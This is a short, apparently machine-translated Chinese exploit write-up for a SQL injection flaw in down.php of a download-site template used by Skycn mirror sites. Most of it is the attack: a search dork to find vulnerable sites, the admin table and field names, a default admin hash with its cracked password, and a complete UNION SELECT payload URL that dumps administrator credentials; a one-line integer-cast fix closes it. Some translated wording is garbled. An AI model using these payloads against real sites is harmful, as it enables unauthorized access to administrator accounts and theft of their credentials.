类型：电子教程大小：8.5M语言：中文评分：8.3标签:Download Now Sky Download Station是国内著名的下载网站，提供国内外最新的免费软件和共享软件下载。在中国铁通、中国联通、全国各地的电信、信息端口都有php MySql搭建的下载分站。相当一部分下载变电站使用的是同一套建站模板，但这套建站模板存在SQL注入漏洞。关键词：inurl:down.php漏洞文件：down.php

down.php中没有get变量$id的过滤措施，这导致攻击者使用SQL注入语句随意攻击。通过测试发现，大部分管理员登录密码的默认密码都没有被修改。默认管理员信息为1111 _ 7363 a 304 be 1a 682 efaf 10702 fc 7b 97d 8，解密密码哈希显示默认密码为sky！@#cn！

注入和利用：

关键字：版权副本；1998 - 2007年Skycn.com版权所有inurl:down.php

http://site.com/down.php?id=1从表名中联合选择列号

Column _ numbers:不是固定的，通常是50，但也小于40。例如，临沂信息端口有38个显示位。

表名：管理员表的名称是主表，字段的名称是用户名、密码

在字段2的软件标题显示位中填写concat(用户名，0x5f，密码)，将弹出管理员登录密码。

SQL EXP:

http://download.site.com/down.php?id=47488和1=2 union select 1，concat(用户名，0x5f，密码)，3，4，5，6，7，8，9，10，11，12，13，14，15，16，17，18，19，20，21，

22，23，24，25，26，27，28，29，30，31，32，33，34，35，36，37，38，39，40，41，42

安全提示：

解决方法：$ id=(int)$ _ GET[' id ']；